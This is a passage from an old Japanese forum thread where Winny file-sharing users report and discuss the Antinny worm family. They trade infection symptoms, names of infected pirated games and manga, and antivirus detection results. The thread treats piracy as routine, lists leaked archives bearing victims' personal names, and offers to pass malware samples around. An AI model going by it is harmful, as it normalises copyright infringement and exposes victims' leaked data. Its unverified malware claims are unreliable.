       ゙、   {8   =O=  |   }   で   r'/,   _..   //  l、、、ヽ_) と
       \  io       ト-─''〉  聞    ゝ(_/_ノ´ /ヽ_ノ/  __,l ヽ)_)‐'  い
         \_ヽ  __,,.. /| .ノ丿ノ   く        {` ーニ[二]‐ク′      い
         .__ |  ̄||   |  しノ'"    と          〉   /  /_      よ
      ,.:'"O  `゙--- || ─┴-─-.、    い        /   ´ ̄`ヽ  )
      {        jl   °     0゙;   い         (____ノ--'
       ̄ ̄ ̄ ̄ ̄ `──‐-----   よ
493[名無し]さん(bin+cue).rar:04/11/25 00:18:10 ID:gjhQ+RQ6
なんだよ今日の厨房度の高さは。
どっかのスレで、ここへの誘導でもしやがったのか?
494[名無し]さん(bin+cue).rar:04/11/25 01:24:31 ID:mFDZp4Bh

このスレでは質問禁止!(>>1にも書いてあるけどな)
495[名無し]さん(bin+cue).rar:04/11/25 02:25:52 ID:7NmLN1PN

↓我が家で釣れた「WORM_ANTINNY.V」の皆さんたち。エロゲの主人公か?w

[仙台ギャラクシーエンジェルズ] [俺のデスクトップ] あや [04-11-03](ファイル詰合せ).zip
[仙台ギャラクシーエンジェルズ] [俺のデスクトップ] まみ [04-11-02](ファイル詰合せ).zip
[仙台ギャラクシーエンジェルズ] [俺のデスクトップ] ケイ [04-11-02](ファイル詰合せ).zip
[仙台ギャラクシーエンジェルズ] [俺のデスクトップ] マナミ [04-11-02](ファイル詰合せ).zip
[仙台ギャラクシーエンジェルズ] [俺のデスクトップ] 優子 [04-11-05](ファイル詰合せ).zip
[仙台ギャラクシーエンジェルズ] [俺のデスクトップ] 彩 [04-11-05](ファイル詰合せ).zip
[仙台ギャラクシーエンジェルズ] [俺のデスクトップ] 栄子 [04-11-05](ファイル詰合せ).zip
[仙台ギャラクシーエンジェルズ] [俺のデスクトップ] 玲子 [04-11-02](ファイル詰合せ).zip
[仙台ギャラクシーエンジェルズ] [俺のデスクトップ] 絵理佳 [04-11-02](ファイル詰合せ).zip
496[名無し]さん(bin+cue).rar:04/11/25 03:26:18 ID:gjhQ+RQ6
>>495
何を今更。
497[名無し]さん(bin+cue).rar:04/11/25 10:30:27 ID:Ej6SUGz0
こんねこに入ってたウィルスに感染しちゃったっぽいんですよ僕
で、regeditがメモ帳になったり、マウントしたCD内のexeと同じアイコンのsvchost.exeが追加されてたりしたんですよ
とりあえず、レジストリの中身もregedit.exeも直して、変なexeも消して起動しなくなったくさいんですよ

で、Winnyを起動してWinny utilityでキャッシュを見たところ、Winnyおいてある(E)ドライブのファイルの状態がUPになってるんですね
全ドライブのファイル検索してもWinnyフォルダ以外にUpFolder.txtとかは存在してないし、Winny.iniでもUpフォルダとかは指定されてないみたいなんですよ
テンプレに書いてあったようなファイルも存在してないし、ウィルススキャンでも引っかからないんですよ
隠しフォルダの中身とかも全部調べたけど、怪しい物は見つからないんですよねぇ。
壁紙も変えられてないし、デスクトップ画像もUPされてる気配ないし・・・
これって新種なんですかね?
498[名無し]さん(bin+cue).rar:04/11/25 10:37:17 ID:d61EsPi6
なにがいいたいのかさっぱりわからん
脳が冒されてるんじゃないか
499[名無し]さん(bin+cue).rar:04/11/25 10:51:21 ID:0x9uuQ2j
クリーンインストで安心だぞ
500[名無し]さん(bin+cue).rar:04/11/25 10:54:26 ID:Ej6SUGz0
>>499
バックアップとり終わったらクリーンインスコする予定でつ
501[名無し]さん(bin+cue).rar:04/11/25 11:39:29 ID:MBUfDyaL
検証できない ぼやきは 俺様日記と同じ。
502[名無し]さん(bin+cue).rar:04/11/25 12:28:38 ID:uw0zFjfz
壁に頭を打ちつけて、脳内をクリーンインスコしろ
503[名無し]さん(bin+cue).rar:04/11/25 14:25:49 ID:HJMKfpzh
あれだね。
仙台発病者は、Cドライブとかiniファイルの中身を全部確認できる
状態にして、しばらく放置=放流するといいよ。

で、ユーザー名なんかの検索キーを明記して質問すれば、有識者が
回収してきたスクショを元にして的確なアドバイスが得られるかも。
504[名無し]さん(bin+cue).rar:04/11/25 15:16:25 ID:+nV3QJSk
ウイルスに感染するような奴はそれ以前に脳が何かに感染している法則
505[名無し]さん(bin+cue).rar:04/11/25 17:43:48 ID:+vlVnp5I
>497
(18禁ゲーム)[041029]こんねこDisc1+2(img+cue+rr3).rar
↑これでOK? 落として調べてみるかな
506[名無し]さん(bin+cue).rar:04/11/25 18:06:26 ID:TfI5rU2I
>>505
それと同じファイル名のものは複数あるよ。
そのうちどれかが仙台入り。
507ひみつの文字列さん:2024/08/04(日) 11:41:22 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
508[名無し]さん(bin+cue).rar:04/11/25 22:05:32 ID:iem4qVZT
>>505
捨てメアド晒したら、送ってあげるけど…仙台キンタマだけで
509[名無し]さん(bin+cue).rar:04/11/25 22:45:01 ID:L0kWFwDB
>>497
隠しファイルになっているUpFolder.txtの中身みてみ。
さっき退治したキンタマが、UPフォルダとUpFolder.txtを作って、ImageMagickの名前を偽装して感染していた。

というかおまいら、Guestユーザ作る脳みそ無いのか?
510[名無し]さん(bin+cue).rar:04/11/26 06:57:24 ID:fjxUeFU4
「ら」は俺たちも入っているのか?
511[名無し]さん(bin+cue).rar:04/11/26 12:19:29 ID:twU97l6y
よーしパパGuestユーザ作っちゃうぞーーープギャー
512[名無し]さん(bin+cue).rar:04/11/26 15:11:41 ID:yTuwFRuk
NYを狙ったウィルスってWinny本体をもってない人が感染した場合はどうなるんでしょうか?
513[名無し]さん(bin+cue).rar:04/11/26 15:47:13 ID:ed49F1D5
>>512
苺キンタマの餌食
514512:04/11/26 15:55:59 ID:yTuwFRuk
ていうのはどういうこと?
515[名無し]さん(bin+cue).rar:04/11/26 15:57:35 ID:avBPodvO
ここは質問スレじゃ(ry
516512:04/11/26 16:01:53 ID:yTuwFRuk
これだけ尾長居します
初心者スレはNY系禁止だったきがしますし
517[名無し]さん(bin+cue).rar:04/11/26 16:10:40 ID:gz0fWCAX
どっかの役所と一緒でたらい回しだな
518[名無し]さん(bin+cue).rar:04/11/26 16:30:36 ID:LUV12Hva
>>516
(~-~*) Winny総合質問29 (*~-~) 
http://tmp4.2ch.net/test/read.cgi/download/1100776582/
すれ立てるまでもない【質問】春よ来い!14
http://tmp4.2ch.net/test/read.cgi/download/1100242055/
に行ってこい。


今度からくだらない質問は、「クリーンインスコしてWinnyやめろ!」か
ダウソ板の質問スレを紹介してやることにしようか。
519512:04/11/26 16:33:51 ID:yTuwFRuk
ありがとうございます
520[名無し]さん(bin+cue).rar:04/11/26 17:28:02 ID:HwKHgPoh
苺キンタマって2chロダにデスクトップとかのSS上げたり2chのスレに“犯罪者で〜す”って書き込む奴だよね?
勝手に掲示板に文章書き込むなんて。怖いよなぁ。
そのうち“○○を××します”みたいな犯罪予告文を勝手に送信する亜種でたら((((((;゚Д゚))))))ガクガクブルブルもんじゃない?
521[名無し]さん(bin+cue).rar:04/11/26 17:30:44 ID:YMcGqgpy
>520
そんなんでブルブルしてるヤツは、早く輝け!
522[名無し]さん(bin+cue).rar:04/11/26 17:31:46 ID:j0jahdhx
激しく既出なネタを振られてもな。
つか、このところの厨房頻出もそうだが、スレタイトルの「構造
解析」ってところを読んでないのかと小一時間(ry。
523[名無し]さん(bin+cue).rar:04/11/26 17:51:20 ID:cPD/XSI9
ウイルス、ワームってキーワードで来てるんだと思う。
この部分を何か他の言葉にしないと、厨房頻出が続くと思う。
他の言葉と言われてもピンと来るのが無いんだが。

少しずれるが、この板以外も含めて全体的に厨房が増えてる気がするのは気のせい?
524[名無し]さん(bin+cue).rar:04/11/26 18:01:18 ID:j0jahdhx
やっぱ次は前スレで候補に挙がってた「ニャーム、ニュイルス」に
しよう(w。
525[名無し]さん(bin+cue).rar:04/11/26 18:05:17 ID:8WdfPamF
だからニュイルス、ニャームにしろと。
厨が激増なのはバカがゲー板にこの板へのご案内貼りまくってるから
526[名無し]さん(bin+cue).rar:04/11/26 18:23:41 ID:YkCyWNJj
>>522
それゆえの厨
527[名無し]さん(bin+cue).rar:04/11/26 18:25:57 ID:0gVUkNmv
ひっかかるのはそういう人なんだから完全排除してどうすんのさ
適当に相手しながら既存のものだったらスルーすりゃいんだよ
528[名無し]さん(bin+cue).rar:04/11/26 18:27:13 ID:ABaiLzTw
マニュアル読まない解説サイト読まないスレタイ読まないテンプレ読まない
529[名無し]さん(bin+cue).rar:04/11/26 18:43:17 ID:j0jahdhx
>>528
それに加えて国語力ないの5重苦だな。
現状をきっちり説明できてない上に、答えてもらっても読み取れ
ないし。
530[名無し]さん(bin+cue).rar:04/11/26 18:55:48 ID:MtEFa5GH
>>527
その通りだな・・・
ウィルスの混入報告は、結構重要だしな
531[名無し]さん(bin+cue).rar:04/11/26 23:02:26 ID:XMPsna2W
>>523
確かに、厨頻度というか出現率が高まっている気がする
ハード板をはじめ各所でそんな感じ…なんでやろ。
そうか、これが新手のワームなのか
532[名無し]さん(bin+cue).rar:04/11/27 00:46:21 ID:A/CDZxJL
感染すると厨な質問を書きなぐるワームか‥‥最凶だな。
533[名無し]さん(bin+cue).rar:04/11/27 02:26:54 ID:RupwXchz
苺キンタマ改変したら作れちゃいそうでイヤだな…
メアド欄に、マシンのユーザー名入れて
「初心者ですけど、質問させてください。〜は〜なんですか? 」とか書いて
「nyに ****** で、デスクトップSSをUPしておきました」
「どなたか、ダウンロードして教えてください?」とかな。
534[名無し]さん(bin+cue).rar:04/11/27 03:06:29 ID:eHfgO1MM
今思ったけど、nyにupされてるjpg、あれって結構最近のもある・・・・・。
くらったやつは馬鹿だな・・・・。フフフ。
っといいながら、ユーザー名なしでUPされたりとかされたりして・・・。   orz
535[名無し]さん(bin+cue).rar:04/11/27 11:53:59 ID:TgqWFUrT

あれだな。ウイルス作者ってその気になればもっと酷い事も出来るんだろうけど
検挙されたり損害賠償喰らったりしないようなギリギリのラインが何処なのかって所が
一番難しいんだろなw  
536534:04/11/27 15:04:22 ID:eHfgO1MM
よかった、無かったようだ。
タスク正常・・・・だと思うし、スキャンともになし・・・・・・。

このままじゃ日記になるんで厨な人達に一言・・・・・・

自己責任&転プレ嫁が分からんのだったらnyすんな、ヴぉけ!
ここは構成解析って書いてあるだろ!?
目が見えんのか!?
既出なのはいらんのだ〜〜!!

やべ〜、厨の連中見てておもわず言ってしまった・・・・・。   orz
537[名無し]さん(bin+cue).rar:04/11/27 15:05:42 ID:W8z7NmYb
自分にいってるのか?
538534:04/11/27 15:08:51 ID:gtIZP5Pa
>>537
そうですがなにか?
539[名無し]さん(bin+cue).rar:04/11/27 15:22:55 ID:5twmFqkT
age厨だし池沼確定だな
540[名無し]さん(bin+cue).rar:04/11/27 15:41:04 ID:doyUV0rV
語尾の・・・・・・・・。がきもすぎ
541534:04/11/27 15:52:16 ID:xqSx6wKh
>>539
ageたくらいで何言ってんだこのカスw
>>540
多分、お前の顔の方がキモいと思うよ(プ
542[名無し]さん(bin+cue).rar:04/11/27 15:54:18 ID:kafOVW7X
自己責任&転プレ嫁が分からんのだったらnyすんな、ヴぉけ!
ここは構成解析って書いてあるだろ!?
    ~~~~~~~~~~

ふーん
543[名無し]さん(bin+cue).rar:04/11/27 15:56:20 ID:FmKnIZ09
534キモ杉
544[名無し]さん(bin+cue).rar:04/11/27 15:57:26 ID:mEK1+GM2
新種みたいだが質が悪いな。
545[名無し]さん(bin+cue).rar:04/11/27 16:04:12 ID:U9rKYtNA
>>534
愛してる。頑張れ
546534:04/11/27 16:34:25 ID:eHfgO1MM
うげ、
修正・・・・・
構成→構造・・・・・・。
547[名無し]さん(bin+cue).rar:04/11/27 16:37:53 ID:y730rDCR
仲良くしなさい・・・・・
そんなんでスレを重くしないで・・・・
無意味な争いが誰のためにもならないというのがまだわからないのか!
548[名無し]さん(bin+cue).rar:04/11/27 16:51:35 ID:mEK1+GM2
>>534>>547なのは一目瞭然。
549[名無し]さん(bin+cue).rar:04/11/27 18:07:08 ID:RieYV4p6
おまいら食い付き良すぎ。
550[名無し]さん(bin+cue).rar:04/11/27 18:14:23 ID:y730rDCR
>>548そういうのはアクセス解析できるようになってから言おうね
別物
551[名無し]さん(bin+cue).rar:04/11/27 18:25:37 ID:/dD58SlR
534は新種のウィルスなので構造解析をお願いします
552[名無し]さん(bin+cue).rar:04/11/27 19:39:27 ID:BiW5IfwW
http://tmp4.2ch.net/test/read.cgi/download/1100072614/

すいません、ここのアドレス踏んだら534という新種?のウィルスに感染してしまった様なのですが
どうすれば良いのでしょう?気持ち悪い自演をしていて見るに堪えません、早く助けて下さい!!!1!
553アボーン∩(゜д゜)∩:04/11/27 19:45:09 ID:+ZHsYrdO
ウイルスってどう作るんだろう  (ボソ
554アボーン∩(゜д゜)∩:04/11/27 19:51:18 ID:+ZHsYrdO
だれか・・・・・
555[名無し]さん(bin+cue).rar:04/11/27 20:46:12 ID:mEK1+GM2
このスレをPart1から全部熟読すれば、その糸口くらいはつか
めるだろう。
556[名無し]さん(bin+cue).rar:04/11/27 21:02:32 ID:Nb/h6CpM
死ねとは何だ死ねとは
557[名無し]さん(bin+cue).rar:04/11/27 21:50:42 ID:ueFTe4qw
池沼は輝け
558[名無し]さん(bin+cue).rar:04/11/27 22:03:42 ID:0cg4d05g
>>553
ソース書いてコンパイル汁
559[名無し]さん(bin+cue).rar:04/11/27 22:36:19 ID:Bpb9Y+6/
漏れ物凄く性格悪いから
ウイルス作るスキルが無くて
本当に良かった。
560[名無し]さん(bin+cue).rar:04/11/27 23:12:00 ID:vOyUKTmy
漏れ物凄く性格良いから
ウイルス作るスキルがあっても  
本当に良かった。
561[名無し]さん(bin+cue).rar:04/11/27 23:47:48 ID:HtFB98Y5
562[名無し]さん(bin+cue).rar:04/11/28 13:04:41 ID:3uHQ3fpl
>>561
これって本当か。
563[名無し]さん(bin+cue).rar:04/11/28 14:53:01 ID:BQqhi/Ff
>>561
エロサイトリンク。踏む必要なし。
564[名無し]さん(bin+cue).rar:04/11/28 15:54:40 ID:YlTrIBkr
gcaファイルって中にウイルスが入っていても
解凍しただけで感染することはないの?
565[名無し]さん(bin+cue).rar:04/11/28 16:00:49 ID:BQqhi/Ff
ワームの発言も凝ったことを言うようになってきたな。
過去スレから学習してるんだろうか?
566[名無し]さん(bin+cue).rar:04/11/28 16:13:19 ID:uVmrqm3h
>>563
一瞬ブスが映ったから速攻で消してスキャンしてたよ('A`)
ただのエロサイトか。
567[名無し]さん(bin+cue).rar:04/11/28 16:48:54 ID:BQqhi/Ff
>>566
途中でいくつかvaluecommerceにポップしてるから、せこい小遣い
稼ぎだろ。いまいち踏まれてないから、>>562みたいな小細工もし
てるが、まっとうに働けよな。
568[名無し]さん(bin+cue).rar:04/11/28 18:58:10 ID:naeaw0gC
LycosがスパムサイトにDDoS攻撃するスクリーンセーバ配布
http://pc5.2ch.net/test/read.cgi/pcnews/1101553307/
569[名無し]さん(bin+cue).rar:04/11/28 21:53:19 ID:jsSPNUmm
知人がキンタマっぽいのに感染したので相談おながいします

【使用OS】 多分……XPHomeかと……
【WindowsUpdateしてるか】 してないっぽい
【AntiVirusは】 ウィルスバスター
【ちゃんとUpdateしてるか】 最新定義ファイルが入っているそうです
【スキャンした結果】 感染報告無し
【オンラインスキャンしたならその結果は】 オンラインスキャンしたかは不明
【Winnyのバージョン】 2.0b7.1かと
【Winny歴、総DL量は】 不明
【テンプレを読んだか】 本人読んだか不明
【テンプレにある対策を実行したか】 ある程度ネットで調べた対策は実行したとの事
【症状か具体的に、分かる限りすべて書く】
UPフォルダを勝手に作成、壁紙を上戸彩のオロナミンCの画像に変更(愚な民とか書かれてるらしい?)、元気ハツラツ〜の声とCM曲が流れる?
レジストリエディタは普通に起動する
【何をしたらそんなことになったのか】 exe踏んだ
【これまでにとった措置】 不明

情報少なくてスマソ……
570[名無し]さん(bin+cue).rar:04/11/28 22:00:56 ID:AmvYxjZO
>>569
落としたファイルの詳細(できればハッシュも)と、どのexeを
踏んだのかまで書いてたら、このスレでは歓迎されるんだがな。
571[名無し]さん(bin+cue).rar:04/11/28 22:07:26 ID:CRJU62YM
>>569
「クリーンインスコしてWinnyやめろ!」とその知人に言っておけ
572[名無し]さん(bin+cue).rar:04/11/28 22:14:01 ID:jsSPNUmm
>>570
スマソ、分からんのよ……こっちから連絡取る手段が無いからなぁ……

>>571
先輩なので無理ポw
573ひみつの文字列さん:2024/08/04(日) 11:41:22 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
574[名無し]さん(bin+cue).rar:04/11/28 22:26:21 ID:NrNqesm5
またエロゲかよ……(((;゚Д゚)))

やっぱり怒ったメーカーが(ry
575[名無し]さん(bin+cue).rar:04/11/28 22:32:31 ID:AmvYxjZO
>>572
面倒見るメリットが無いのならほっとけ。
後でそいつのスクショ落として笑ってやれ。
万が一、そいつが激エロいお姉様系なら万難を排してサポート
しろ。(w
576[名無し]さん(bin+cue).rar:04/11/28 22:42:17 ID:jsSPNUmm
>>575
んー……無いといえば無いが……ただ自分も気になってるってのが有るかな。
今のところ上戸出たって報告有る?
577[名無し]さん(bin+cue).rar:04/11/28 22:47:18 ID:ElqhtgED
>>569
その知人とやらを小一時間問いつめてテンプレを完全に埋めてから出直して鯉
不完全な情報ほどたちの悪いもんは無いからな
578ひみつの文字列さん:2024/08/04(日) 11:41:22 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
579[名無し]さん(bin+cue).rar:04/11/28 22:52:28 ID:acz4Uok5
>>578
それ偽報告らしい
580[名無し]さん(bin+cue).rar:04/11/28 23:00:05 ID:jsSPNUmm
>>577
了解、気長に連絡が来るのを待つよ。

……連絡が来るより先に画像が流れてそうだけどw
581[名無し]さん(bin+cue).rar:04/11/28 23:21:22 ID:hYyisDpa
エロゲは確実にバイナリ実行されるから何か仕込むにはもってこいだな
582[名無し]さん(bin+cue).rar:04/11/28 23:27:00 ID:bad/xulS
知人が=自分が
583[名無し]さん(bin+cue).rar:04/11/28 23:34:28 ID:jsSPNUmm
>>582
残念ながら=でないんだなw
584[名無し]さん(bin+cue).rar:04/11/28 23:36:58 ID:qq7ULzqY
(・∀・)ニヤニヤ
585[名無し]さん(bin+cue).rar:04/11/28 23:41:33 ID:pUigA4WV
(・∀・)ニヤニヤ
586[名無し]さん(bin+cue).rar:04/11/28 23:42:55 ID:7jufnsS/
連絡が取れないってことは、その友人はあんたのことを便利な道具って思ってるんじゃないかな?
587[名無し]さん(bin+cue).rar:04/11/29 00:02:42 ID:thFigN1I
>>584-585
ヽ(`Д´)ノナンダヨー
>>586
友人……というか先輩だしね、色々世話になってるし別にそれぐらい構わないかなっと

むぅ、ここの住人は釣りが上手いなw
588[名無し]さん(bin+cue).rar:04/11/29 00:03:35 ID:70y525l+
( ´д)ヒソ(´д`)ヒソ(д` )
589[名無し]さん(bin+cue).rar:04/11/29 00:08:16 ID:ieJTgUap
プニュ( ´∀`)σ)Д`) ←>>587
590[名無し]さん(bin+cue).rar:04/11/29 00:10:39 ID:92LPS3tI
自分で落としてるだけマシかもな>先輩
591[名無し]さん(bin+cue).rar:04/11/29 00:11:36 ID:92LPS3tI
まてまて。そうとも限らないか。
592[名無し]さん(bin+cue).rar:04/11/29 00:18:19 ID:thFigN1I
とりあえず連絡こないし、スレ違いな話題になりかけてるし、もう寝ます。

(´・ω・`)ノシ スレ汚しスマソですた
593[名無し]さん(bin+cue).rar:04/11/29 00:48:42 ID:LUThPrwb
土日は面白い人が沢山来るなぁ
594[名無し]さん(bin+cue).rar:04/11/29 00:51:18 ID:6B17SKVf
その頃その友人は、
暗いアパートの一室で、静かに息をひきとった―――
595[名無し]さん(bin+cue).rar:04/11/29 01:36:09 ID:TGfDKMQF
>>594
何があったんだw
596[名無し]さん(bin+cue).rar:04/11/29 03:56:16 ID:J8RjPDSQ
ただの破損ファイルっぽいのですが、ちょっと気になったのでもし分かったことがあったら教えてください。

【使用OS】 XPHome(SP2導入済み)
【WindowsUpdateしてるか】 しています。
【AntiVirusは】 脳豚先生
【ちゃんとUpdateしてるか】 最新定義ファイル導入済み(公式HPから落としてきたexeを導入済み)
【スキャンした結果】 感染報告無し
【オンラインスキャンしたならその結果は】 感染報告なし
【Winnyのバージョン】 2.0b7.1
【Winny歴、総DL量は】 1年半、もう覚えてない。
【テンプレを読んだか】 一週間に一回ぐらいは読むようにしてる。
【テンプレにある対策を実行したか】  ・レジストリ:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run のアクセス権を制限する。
 ※アプリケーションのインストール時に弊害が起こることもあるので注意。
↑ここ以外してます。

【症状を具体的に、分かる限りすべて書く】何かあやすぃexeがある。
【何をしたらそんなことになったのか】 zipファイルを+Lhaca ver0.74で解凍したら、
パスXXXXXXXXXXは存在しないか、ディレクトリではありません。(XXXXはファイル名)
っとエクスプローラで表示・・・・。   orz
また着尺製?ってな感じで思ったのです。
【これまでにとった措置】 あやしいexeをssmで動作停止させた。
597[名無し]さん(bin+cue).rar:04/11/29 05:05:54 ID:bsLG7avu
その解凍したzipファイルのハッシュを出せ、話はそれからだ
598ひみつの文字列さん:2024/08/04(日) 11:41:22 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
599[名無し]さん(bin+cue).rar:04/11/29 11:05:52 ID:tYUMYhkg
>573
うちのVB反応しないんだが…
DVDDプロテクトは掛かってるっぽい。

社員の方ですか?
600[名無し]さん(bin+cue).rar:04/11/29 11:47:07 ID:KmRToYT8
>>599
いや満淫はマジだよ
↓某スレの一部

>これインストしたらノートン先生に「ウイルスじゃ、ぼけー」って怒られますた・・・

>満淫電車、ウイルスバスター2005だと反応なし。

>満淫落とし終わったから見てみたら確かにウィルスだったな
>プロテクトスレ逝ってみたらまだSFで起動するイメージつくれねぇっていう段階の話だったのにワラタw

>Win32:Trojano-829 [Trj]
>\program files\bishop\MDDVD\mddvd.exe
601[名無し]さん(bin+cue).rar:04/11/29 11:47:47 ID:KmRToYT8
↓続き
>mddvd.exe NAV2004 だとAntinny.Gだといわれる
>AntiVir(フリー)だと、The Trojan horse TR/PSW.Wingoc
>という反応
>AVG7では反応なし(Antinny.Gに対応していない?)

>インスコ中file protect及びanti virus掛ける ご覧の通りエラー出た
>virus scanしたら
>このウィルスが出てる ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.G


いま流れてるのは多分全部何か仕込んである
602[名無し]さん(bin+cue).rar:04/11/29 11:51:02 ID:KmRToYT8
ちなみに八首は>>573のやつ
603[名無し]さん(bin+cue).rar:04/11/29 11:57:46 ID:tYUMYhkg
>600
ありがd…なんか挙動怪しいんで実行後リセットボタンは押したんですが

VBだめぽ…

別のでスキャンしてみまつ
604[名無し]さん(bin+cue).rar:04/11/29 13:53:43 ID:rXNyipqW
visual basic
605[名無し]さん(bin+cue).rar:04/11/29 17:42:59 ID:HTWFLnaS
>>573
満淫に仕込まれたウィルスの詳細

>1.nyのUPフォルダを追加するc:\windows\system32\network
>2.そこにマシン内のテキストファイル、cookie、デジカメの画像ファイルと思われるもの、excelのデータファイル、wordのデータファイルを圧縮して突っ込む
>3.ほかにもやっているようだ。 詳細は不明

>実行してしまったら、いまのとこフォーマットする以外にない。
>ファイルをあちこち書き換えているようだから、ノートンで駆除したあとも安心してはいけない。
>ちなみに、11/28現在、ウィルスバスターでは駆除も検出もできない。
606[名無し]さん(bin+cue).rar:04/11/29 18:36:36 ID:9HbgFKPb
Virtual Boy
607[名無し]さん(bin+cue).rar:04/11/29 19:16:05 ID:ue1QkRn3
>>605
症状からすると、仙台キンタマとほぼ同時に出てきた、例のscrものらしいね
拡張子変えるかして、埋め込まれたかな。
608[名無し]さん(bin+cue).rar:04/11/29 19:36:28 ID:6CJqeDzH
go back使えば恐れるものなど何もないよな。
609[名無し]さん(bin+cue).rar:04/11/29 19:41:26 ID:BLoNwT29
俺はコムガードを入れた。
やばげなのをチェックするとき、有効にしてる。
ttp://www.idk.co.jp/products/hdg/HDG-01B.html
610[名無し]さん(bin+cue).rar:04/11/29 21:04:25 ID:c3qMyp4n
>>605
を見て試してみたけど、島ンテック・舞クロトレンドのオンラインスキャンでも検出できなかった。
実行しないと検出できないのかな。

前回のこんねこのは試してないけど同じものですよね?
あれから対策してないとは思えないけど…亜種なんでしょうか
611[名無し]さん(bin+cue).rar:04/11/29 21:59:14 ID:loUB1ivE
>>610
俺は脳豚ユーザーだが、こんねこはW32.SillyP2Pとして対策済み。
おそらく亜種だと思われ。

どうでもいいことだが、舞クロトレンドじゃなくてトレンド舞クロな。
612569:04/11/29 22:13:06 ID:thFigN1I
とりあえず電話きたので、聞きなおした分だけ修正

【使用OS】 XPHome
【WindowsUpdateしてるか】 SP2
【オンラインスキャンしたならその結果は】 今実行中
【Winnyのバージョン】 2.0b7.1かと
【Winny歴、総DL量は】 半年 7Gぐらい?
【テンプレを読んだか】 読んで無い……説明は一応しますた
【症状か具体的に、分かる限りすべて書く】
(日本語で何か書かれていたらしい).exeを実行
CM曲が流れて、壁紙を上戸彩のオロナミンCの画像に変更(愚な民とか書かれてるらしい?)
ダイアログボックスらしきもの起動(オフコース(Yes)、ヌルポース(No))←実行せずに再起動
・再起動後
オロナミンC.wavがCドライブに作成さてていた
Downフォルダを新規作成(--.zipというファイルが入っていたらしい)
UpFolder.txtを新規作成
スタートアップに不明なファイルが追加されていた(名前不明)

とりあえずこんなんですが現状で何か分かるでしょうか(´・ω・`)
613[名無し]さん(bin+cue).rar:04/11/29 22:14:58 ID:xhqmLiwc
>>612
>ダイアログボックスらしきもの起動(オフコース(Yes)、ヌルポース(No))
やべぇ、ワラタw
614[名無し]さん(bin+cue).rar:04/11/29 22:17:54 ID:c3qMyp4n
>>611
素で間違えていました…訂正ありがとうです。
毎週末に亜種発生とはエロゲマーも業者さんも大変ですねえ
615[名無し]さん(bin+cue).rar:04/11/29 22:37:36 ID:0PF1Co53
>>612
最低でもオンラインスキャンした後にかけ
616[名無し]さん(bin+cue).rar:04/11/29 22:40:43 ID:Dcc3aL6z
SP2にしてたら、exe踏んだ時に
実行しますか?って
きいてくるような…

またいい記事のネタができたな
中の人はこれを取り上げるだろうか
617[名無し]さん(bin+cue).rar:04/11/29 22:40:55 ID:zK3aImus
>>573
これ仙台の亜種だな…
ちなみにmddvd.exeに仕込まれてる
誰か提出して対応してもらえよ(゚Д゚)

それにしてもVBはこういうの対応が糞遅いな
618[名無し]さん(bin+cue).rar:04/11/29 22:42:35 ID:HCRI9sZl
脳内先輩には再インスコをお勧めする。
619569:04/11/29 22:46:10 ID:thFigN1I
>>615
ごもっとも、スキャン後電話するって言ってたのでまた後ほど
>>616
そなの?そんな話は聞いてないが・・・うーん?
記事ってなんぞや?
>>618
また脳内扱いカヨウワーン
620[名無し]さん(bin+cue).rar:04/11/29 22:51:33 ID:e00VtVWX
>>612
7GBしか落としてないとか嘘っぽいが
手当たり次第に落とす鬼畜でもなきゃ、ウイルスなんてひっからん
たぶん、その名称不明のexeもお尻ぷりんセスなみに恥ずかしいエロだろ
621[名無し]さん(bin+cue).rar:04/11/29 23:04:07 ID:BuKBtJlJ
中の人はブツを手に入れないとダメだろ
622569:04/11/29 23:12:02 ID:thFigN1I
電話キタ、どうやらDLしたファイルは
デ○ノート 48話(中身は47話19P分+exe) ※正確なファイル名は不明
らしい

オンランスキャンはなんかDL中に固まってるらしい
とりあえず、漏れには解決出来そうに無いしフォーマットを勧めておいた。
623[名無し]さん(bin+cue).rar:04/11/29 23:25:54 ID:YG+Kp/Tr
ネタとは言わないが
いい加減ウザイよ
624569:04/11/29 23:34:31 ID:thFigN1I
>>623
む、スマソ、もう消えますわ
625[名無し]さん(bin+cue).rar:04/11/29 23:36:23 ID:BLoNwT29
>>622
ですのがウイルス持ちなのは、かなり前から既出。
626[名無し]さん(bin+cue).rar:04/11/29 23:39:50 ID:4S/S47f+
ラーメン発見伝にウイルスが入っていたらしい。
スキャンでバスターが削除したから詳細は分からなかったけど。
627[名無し]さん(bin+cue).rar:04/11/30 04:48:10 ID:R5kapR6J
(゚Д゚)
628[名無し]さん(bin+cue).rar:04/11/30 05:24:46 ID:JjvcwVOk
ラーメン発見伝にウィルス入れてもあんまり広まらんと思うんだが
629[名無し]さん(bin+cue).rar:04/11/30 10:12:23 ID:jnJvN4R5
わざと仕込んでるというより、ぬるぽ亜種が仕込んだのを放流してるだけでは
630[名無し]さん(bin+cue).rar:04/11/30 10:15:25 ID:FnjCXjPP
というかバスターが削除したんなら既存のだろ
いちいち何にウイルス入ってたなんて報告する必要はないだろ
631[名無し]さん(bin+cue).rar:04/11/30 12:24:36 ID:u1U6XpEU
いや、情報は一杯あったほうがいいと思うけど・・・
「ですの」も注意するようになったし
報告は取捨て選択していけば、いいと思う
632[名無し]さん(bin+cue).rar:04/11/30 16:18:45 ID:Lfyr3JvX
とごげこんとけす、かおあきめんでそ。かぐずうぃてくそけなこしろふぃむ。
とよけおけかにずかわけむこいそんせかむけしんご。
かたかみねんこげずすいこむけしこ。
633[名無し]さん(bin+cue).rar:04/11/30 20:06:35 ID:eWqABdaa
復活の呪文か?
634[email protected]:04/11/30 20:55:45 ID:YdqVBs3T
635[名無し]さん(bin+cue).rar:04/12/01 02:01:59 ID:8KKHaMmK
初心者の質問ですが、もしよろしければご返答下さい。
この間、ダウソしたファイルがexeでうっかりクリックしてしまったんですよ。
そしたら、今日、今までHDDに保存してた画像を見てみたら、数個あるフォルダの
内の画像がごっそり無くなってました。
ゴミ箱の中もありませんでした。
こういった画像を消去してしまうウィルスやワームってあるんですか?

636[名無し]さん(bin+cue).rar:04/12/01 02:14:43 ID:GlRgshX4
